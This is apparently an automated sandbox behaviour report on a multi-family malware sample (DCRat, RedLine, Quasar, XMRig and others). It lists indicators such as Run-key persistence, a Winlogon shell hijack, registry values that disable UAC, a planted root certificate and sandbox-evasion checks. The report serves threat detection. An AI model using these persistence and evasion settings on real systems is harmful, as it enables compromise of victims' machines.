dcrat | cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Local\\updater.exe\""	kyhjasehs.exe

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000b000000023bb0-60.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4008	1936	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1096	1936	schtasks.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4464	1936	schtasks.exe	89

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023d16-916.dat	family_quasar
behavioral1/memory/4112-921-0x00000000008A0000-0x0000000000BC4000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023c53-316.dat	family_redline
behavioral1/memory/5004-321-0x0000000000390000-0x00000000003E2000-memory.dmp	family_redline

Redline family
redline
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

resource	yara_rule
behavioral1/memory/2456-506-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Snakekeylogger family
snakekeylogger

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 4364 created 3440	4364	Ul.pif	56
PID 408 created 3440	408	3532634971.exe	56
PID 408 created 3440	408	3532634971.exe	56
PID 4340 created 3440	4340	winupsecvmgr.exe	56
PID 4340 created 3440	4340	winupsecvmgr.exe	56
PID 4340 created 3440	4340	winupsecvmgr.exe	56

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat payload 2 IoCs

rat

resource	yara_rule
behavioral1/files/0x000a000000023bc6-120.dat	family_dcrat_v2
behavioral1/memory/3064-127-0x0000000000240000-0x000000000040A000-memory.dmp	family_dcrat_v2

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3EUEYgl.exe

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral1/memory/4108-426-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral1/memory/4108-427-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral1/memory/4108-430-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral1/memory/4108-429-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral1/memory/4108-428-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral1/memory/4108-431-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral1/memory/4108-432-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral1/memory/4108-440-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral1/memory/4108-442-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig
behavioral1/memory/4108-456-0x0000000140000000-0x0000000140770000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4308	powershell.exe
408	powershell.exe
8000	powershell.exe
1976	powershell.exe
5208	powershell.exe

Downloads MZ/PE file

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

T1564.001

pid	Process
8664	attrib.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3EUEYgl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3EUEYgl.exe

Checks computer location settings 2 TTPs 22 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	kyhjasehs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	intosvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	Gxtuum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	FACTURA-09876RT567800.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	pornhub_downloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	explorer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	nothjgdwa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	LukeJazz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	explorer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	PORNHU~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	Bloxflip%20Predictor.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	cvv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	2968224716.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	updater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	C1J7SVw.exe

Drops startup file 8 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	Bloxflip%20Predictor.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	Bloxflip Predictor.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe	l4.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe	l4.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	XClient.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url	cmd.exe

Executes dropped EXE 64 IoCs

pid	Process
1876	4363463463464363463463463.exe
212	test-again.exe
520	nano.exe
4580	New Text Document mod.exe
5004	o.exe
4408	nothjgdwa.exe
1888	Gxtuum.exe
2464	random.exe
2640	client.exe
3064	kyhjasehs.exe
3460	sysnldcvmr.exe
4824	cvv.exe
992	7z.exe
4008	FACTURA-09876RT567800.exe
1096	intosvc.exe
1788	7z.exe
1556	XClient.exe
4976	7z.exe
4576	7z.exe
652	7z.exe
4692	newtpp.exe
4504	7z.exe
2532	7z.exe
2548	7z.exe
1376	in.exe
5004	xxl.exe
3944	l4.exe
4696	tester.exe
3272	l4.exe
3052	updater.exe
2532	explorer.exe
1372	Gxtuum.exe
4944	Intel_PTT_EK_Recertification.exe
1436	2968224716.exe
2456	FACTURA-09876RT567800.exe
1864	2880822053.exe
3932	LukeJazz.exe
4484	W4KLQf7.exe
2932	yiklfON.exe
2460	AzVRM7c.exe
4364	Ul.pif
2532	3291433011.exe
408	3532634971.exe
600	graph.exe
1452	tester.exe
1156	updater.exe
4008	explorer.exe
2288	3084722593.exe
4340	winupsecvmgr.exe
3924	Z9Pp9pM.exe
4112	discord.exe
4892	mtbkkesfthae.exe
4788	LummaC2.exe
2832	Client.exe
2556	svhosts.exe
428	Client-built.exe
4468	pornhub_downloader.exe
5216	random.exe
5540	khtoawdltrha.exe
5724	NoEscape.exe
5792	Bloxflip%20Predictor.exe
5924	PORNHU~1.EXE
4908	C1J7SVw.exe
4828	yiklfON.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	3EUEYgl.exe

Loads dropped DLL 14 IoCs

pid	Process
992	7z.exe
1788	7z.exe
4976	7z.exe
4576	7z.exe
652	7z.exe
4504	7z.exe
2532	7z.exe
2548	7z.exe
3272	l4.exe
3272	l4.exe
3272	l4.exe
3272	l4.exe
3272	l4.exe
3272	l4.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	FACTURA-09876RT567800.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	FACTURA-09876RT567800.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	FACTURA-09876RT567800.exe

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	o.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\updater = "\"C:\\Users\\Admin\\AppData\\Local\\updater.exe\""	kyhjasehs.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\updater = "\"C:\\Users\\Admin\\AppData\\Local\\updater.exe\""	kyhjasehs.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe"	AzVRM7c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\My Program = "C:\\Users\\Admin\\AppData\\Local\\MyHiddenFolder\\RegAsm.exe"	RegAsm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Windows\\Bloxflip Predictor.exe"	Bloxflip%20Predictor.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Service = "C:\\Program Files (x86)\\DHCP Service\\dhcpsvc.exe"	nano.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

defense_evasion privilege_escalation

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	nano.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
64	raw.githubusercontent.com
72	discord.com
73	discord.com
81	discord.com
125	drive.google.com
126	drive.google.com
56	raw.githubusercontent.com
57	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
105	checkip.dyndns.org
139	ipinfo.io
140	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000a000000023cf3-1979.dat	autoit_exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\xqt5sk.exe	csc.exe
File created	\??\c:\Windows\System32\CSC2CA6E1F3DA984E968ECE537E1EAC7E2.TMP	csc.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1580	tasklist.exe
2100	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
5216	random.exe
5540	khtoawdltrha.exe
5600	3EUEYgl.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 4944 set thread context of 4108	4944	Intel_PTT_EK_Recertification.exe	177
PID 4008 set thread context of 2456	4008	FACTURA-09876RT567800.exe	195
PID 4696 set thread context of 1452	4696	tester.exe	228
PID 2556 set thread context of 3960	2556	svhosts.exe	254
PID 2932 set thread context of 916	2932	yiklfON.exe	273
PID 4340 set thread context of 7008	4340	winupsecvmgr.exe	295
PID 4340 set thread context of 5216	4340	winupsecvmgr.exe	297

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1376-313-0x00007FF74F5A0000-0x00007FF74FA30000-memory.dmp	upx
behavioral1/memory/4944-424-0x00007FF60DEE0000-0x00007FF60E370000-memory.dmp	upx
behavioral1/memory/4944-443-0x00007FF60DEE0000-0x00007FF60E370000-memory.dmp	upx
behavioral1/files/0x0007000000023d1d-2296.dat	upx
behavioral1/memory/5500-2299-0x00000000004B0000-0x0000000000C2B000-memory.dmp	upx
behavioral1/memory/6576-3404-0x00007FF60DEE0000-0x00007FF60E370000-memory.dmp	upx

Drops file in Program Files directory 11 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\d644733565d465	intosvc.exe
File opened for modification	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	AzVRM7c.exe
File created	C:\Program Files (x86)\DHCP Service\dhcpsvc.exe	nano.exe
File opened for modification	C:\Program Files (x86)\DHCP Service\dhcpsvc.exe	nano.exe
File created	C:\Program Files (x86)\Google\Temp\7a0fd90576e088	intosvc.exe
File created	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip	AzVRM7c.exe
File created	C:\Program Files\Windows Media Player\graph\graph.exe	AzVRM7c.exe
File opened for modification	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	AzVRM7c.exe
File created	C:\Program Files (x86)\Google\Temp\explorer.exe	intosvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\w32tm.exe	intosvc.exe
File created	C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	AzVRM7c.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\sysnldcvmr.exe	o.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	o.exe
File created	C:\Windows\Bloxflip Predictor.exe	Bloxflip%20Predictor.exe
File opened for modification	C:\Windows\Bloxflip Predictor.exe	attrib.exe
File created	C:\Windows\Tasks\Gxtuum.job	nothjgdwa.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

Create Process with Token

T1134.002

pid	Process
5748	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dynpvoy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	W4KLQf7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	newtpp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nano.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pornhub_downloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yiklfON.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tester.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3EUEYgl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bloxflip Predictor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3291433011.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	khtoawdltrha.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bloxflip%20Predictor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2880822053.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FACTURA-09876RT567800.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LummaC2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FACTURA-09876RT567800.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LukeJazz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mtbkkesfthae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svhosts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xxl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yiklfON.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nothjgdwa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ul.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Z9Pp9pM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C1J7SVw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NoEscape.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	M5iFR20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PORNHU~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3084722593.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	o.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tester.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 7 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2292	PING.EXE
1452	powershell.exe
3636	PING.EXE
2704	powershell.exe
1696	PING.EXE
4248	PING.EXE
6216	PING.EXE

Delays execution with timeout.exe 2 IoCs

pid	Process
7344	timeout.exe
5056	timeout.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
6544	systeminfo.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	292	Go-http-client/1.1

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	kyhjasehs.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	intosvc.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	updater.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	updater.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	cvv.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	xxl.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	xxl.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
4248	PING.EXE
6216	PING.EXE
2292	PING.EXE
3636	PING.EXE
1696	PING.EXE

